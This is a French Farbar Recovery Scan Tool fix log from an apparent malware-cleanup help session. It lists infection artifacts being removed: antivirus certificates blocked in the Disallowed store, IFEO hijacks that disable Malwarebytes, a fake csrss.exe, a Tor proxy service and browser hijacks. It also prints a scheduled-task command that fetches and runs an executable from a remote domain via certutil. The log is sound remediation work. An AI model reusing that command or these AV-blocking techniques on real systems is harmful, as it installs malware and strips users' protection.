Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 03.06.2018
Exécuté par patou (04-06-2018 18:19:05) Run:1
Exécuté depuis C:\Users\patou\Desktop
Profils chargés: patou (Profils disponibles: patou)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions)
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation)
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot)
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL)
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG)
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation)
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation)
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro)
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.)
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com)
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab)
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ)
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools)
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd)
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.)
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd)
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.)
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd)
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd)
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd)
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee)
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions)
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee)
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software)
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.)
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.)
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security)
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.)
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG)
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd)
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET)
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ)
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software)
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation)
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation)
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro)
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab)
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security)
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software)
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.)
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ)
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL)
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET)
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L)
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\...\Run: [AutumnWater] => C:\Windows\rss\csrss.exe [3188736 2018-06-04] ()
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\...\Run: [CloudNet] => C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-04] (EpicNet Inc.)
IFEO\7za.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\assistant.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\hola.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\hola_setup.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\hola_svc.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\hola_updater.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\IMF_ActionCenterDownloader.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\malwarebytes_assistant.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbam.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbamdor.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbampt.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbamresearch.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbamscheduler.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbamservice.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbamtray.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mweshield.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mweshieldup.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mwesmanager.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mwessweeper.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
ShellExecuteHooks: Pas de nom - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - -> Pas de fichier
GroupPolicy: Restriction ?
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYh7SmU9Toh2f2c4s_UDCiHA3EU7TXj9eNbsR4cyT7Dr6AORoMzvo3utxRHbkW4CopZRyibbguzjc0VL-paGa3NyP81J3Cs8-pTABl3e-pyq4ZWBcn9hnTJHGOkOnoN-YU6xKAotgHHxYd1HR-va5mbcd3mLUoK38bQ96c7HTc,&q={searchTerms}
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYh7SmU9Toh2f2c4s_UDCiHA3EU7TXj9eNbsR4cyT7Dr6AORoMzvo3utxRHbkW4CopZRyibbguzjc0VIw0Ea9M9NwjWSgQx681kLU54KEqjUkxUqMUhO_m2prc2KW_LeC02giXAoVkWV8PIHUzWwAvWYpuQnbGo6_s8RYuoH_U,
SearchScopes: HKU\S-1-5-21-1000389763-2980830304-2624313999-1000 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B6B5028FF-F684-450C-BA49-20DA4C8278F2%7D&gp=811610
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> Pas de fichier
FF HKLM-x32\...\Firefox\Extensions: [otis@digitalpersona.com] - C:\Program Files (x86)\DigitalPersona\Bin\FirefoxExt => non trouvé(e)
FF HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\patou\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi => non trouvé(e)
CHR res: infecté resources.pak (Adware script). Réinstallez Chrome.
CHR HomePage: Default -> inline.go.mail.ru
CHR DefaultSearchURL: Default -> hxxps://inline.go.mail.ru/search?inline_comp=dse&q={searchTerms}&fr=chxtn12.0.23
CHR DefaultSearchKeyword: Default -> inline.go.mail.ru
CHR DefaultSuggestURL: Default -> hxxp://suggests.go.mail.ru/chrome?q={searchTerms}
CHR Extension: (Домашняя страница Mail.Ru) - C:\Users\patou\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif [2018-06-04]
R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ATTENTION (zéro octet Fichier/Dossier)
S4 TCPSvc; "C:\Users\patou\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\patou\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\patou\AppData\Local\Temp\csrss\proxy\t"
S1 mwescontroller; \??\C:\Windows\system32\drivers\mwescontroller.sys [X]
C:\Windows\rss\csrss.exe
C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
2018-06-04 16:03 - 2018-06-04 16:03 - 000492544 _____ () C:\Users\patou\AppData\Local\Temp\s3.exe
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\TCPSvc
C:\Users\patou\AppData\Local\Temp\csrss\proxy\tor.exe
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72449F31-D047-4C58-925B-334EFCB1471D
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{72449F31-D047-4C58-925B-334EFCB1471D
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{72449F31-D047-4C58-925B-334EFCB1471D
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Maintenance\{72449F31-D047-4C58-925B-334EFCB1471D
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{72449F31-D047-4C58-925B-334EFCB1471D
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{72449F31-D047-4C58-925B-334EFCB1471D
C:\Windows\System32\Tasks\csrss
C:\Windows\rss\csrss.exe
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|AutumnWater
DeleteValue: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|CloudNet
C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
DeleteValue: HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Windows\CurrentVersion\Run|AutumnWater
DeleteValue: HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Windows\CurrentVersion\Run|CloudNet
C:\Windows\Temp\gEA11.tmp.exe
C:\Windows\windefender.exe
C:\Users\patou\AppData\Local\Temp\wup\wupv.exe
DeleteKey: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}
DeleteKey: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}
DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{8A69D345-D564-463c-AFF1-A69D9E530F96}
DeleteKey: HKCR\CLSID\{8A69D345-D564-463c-AFF1-A69D9E530F96}
DeleteKey: HKCU\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet
DeleteKey: HKCU\SOFTWARE\Chromium
DeleteKey: HKCU\SOFTWARE\EpicNet Inc.
DeleteKey: HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\SOFTWARE\EpicNet Inc.
C:\ProgramData\SupportAssist
C:\ProgramData\SWCUTemp
C:\Users\patou\AppData\Roaming\EpicNet Inc
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks|{BFD98515-CD74-48A4-98E2-13D209E3EE4F}
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glary Utilities
DeleteKey: HKLM\Software\Classes\CLSID\{B3C418F8-922B-4faf-915E-59BC14448CF7}
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter
DeleteKey: HKLM\Software\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter
DeleteKey: HKLM\Software\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\Glarysoft MalwareHunter
DeleteKey: HKLM\Software\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AthBtTray
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AtherosBtStack
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AutumnWater
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\CloudNet
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\FLxHCIm64
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\HP Deskjet 3050A J611 series (NET)
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\MSC
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Skype
unlock: C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\ProgramData\Blogger\Blogger.exe
C:\Users\patou\AppData\Roaming\Folder\Service.exe
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\cloudnet.exe
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\csrss.exe
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\g5D.tmp.exe
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\gC705.tmp.exe
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\WinmonProcessMonitor.sys
C:\Windows\Installer\18f77.msi
C:\Windows\Installer\1c581e4.msp
C:\Windows\Installer\316307.msp
C:\Windows\Installer\3fde3c.msp
C:\Windows\Installer\cd260c.msp
C:\Windows\Installer\cf5db.msp
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\TCPSvc
C:\Users\patou\AppData\Local\Temp\csrss\proxy\tor.exe
C:\Windows\rss\csrss.exe
C:\Windows\System32\Tasks\csrss
C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
C:\Windows\Temp\gEA11.tmp.exe
C:\Windows\windefender.exe
C:\Users\patou\AppData\Local\Temp\wup\wupv.exe
DeleteKey: HKLM\Software\WOW6432Node\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}
DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet
C:\Users\patou\AppData\Roaming\EpicNet Inc
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glary Utilities
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter
DeleteKey: HKLM\Software\Wow6432Node\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}
DeleteKey: HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter
DeleteKey: HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32
DeleteKey: HKLM\Software\Classes\Drive\shellex\ContextMenuHandlers\Glarysoft MalwareHunter
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Shared Tools\MSConfig\startupreg\AutumnWater
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Shared Tools\MSConfig\startupreg\CloudNet
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\cloudnet.exe
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{421C7726-58B8-40A1-983B-971B4487B150}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{A0B09702-C233-4909-9E68-D442F9E01024}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{9AA2D37C-F863-49A3-A2F2-E99222C76020}
DeleteValue: HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules|{7205486D-6178-404B-A2CB-BB4A4963CFF6}
C:\Windows\Installer\18f77.msi
C:\Windows\Installer\1c581e4.msp
C:\Windows\Installer\316307.msp
C:\Windows\Installer\3fde3c.msp
C:\Windows\Installer\c0c16.msp
C:\Windows\Installer\cd260c.msp
C:\Windows\Installer\cf5db.msp
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ShellIconOverlayIdentifiers: [snxPluginsShell] -> {F4B3B0AA-13D1-4a36-BDA2-2055B0F3D5DE} => -> Pas de fichier
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => -> Pas de fichier
ContextMenuHandlers1: [Glary Utilities] -> {B3C418F8-922B-4faf-915E-59BC14448CF7} => -> Pas de fichier
Task: {72449F31-D047-4C58-925B-334EFCB1471D} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-04] ()
Task: {72449F31-D047-4C58-925B-334EFCB1471D} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-04] ()
Task: {735BB0D7-C364-4093-8CEB-5CADB85B296C} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\patou\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\patou\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {75D278E1-C0D0-450A-B832-21A5DFEF0CC6} - System32\Tasks\SgeepHD => C:\Windows\system32\rundll32.exe "C:\Program Files\SgeepHD\SgeepHD.dll",kxQxWs
AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [152]
AlternateDataStreams: C:\ProgramData\TEMP:5D432CE3 [124]
FirewallRules: [{9E242FAA-39B1-4AF0-87CA-A8A1D2CB1450}] => (Allow) C:\Windows\system32\rundll32.exe
FirewallRules: [{CFEFC8C3-84C6-4E92-8FE2-CF7D734025ED}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{D5919E89-E2DE-4E6A-B7D9-097A43262348}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{421C7726-58B8-40A1-983B-971B4487B150}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{A0B09702-C233-4909-9E68-D442F9E01024}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{0B3B15B8-A375-4D87-BBEB-F65AC94E2C12}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{CD247549-C72F-49F2-93E8-EABC28C3E0FD}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{9AA2D37C-F863-49A3-A2F2-E99222C76020}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{7205486D-6178-404B-A2CB-BB4A4963CFF6}] => (Allow) C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
EmptyTemp:
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => supprimé(es) avec succès
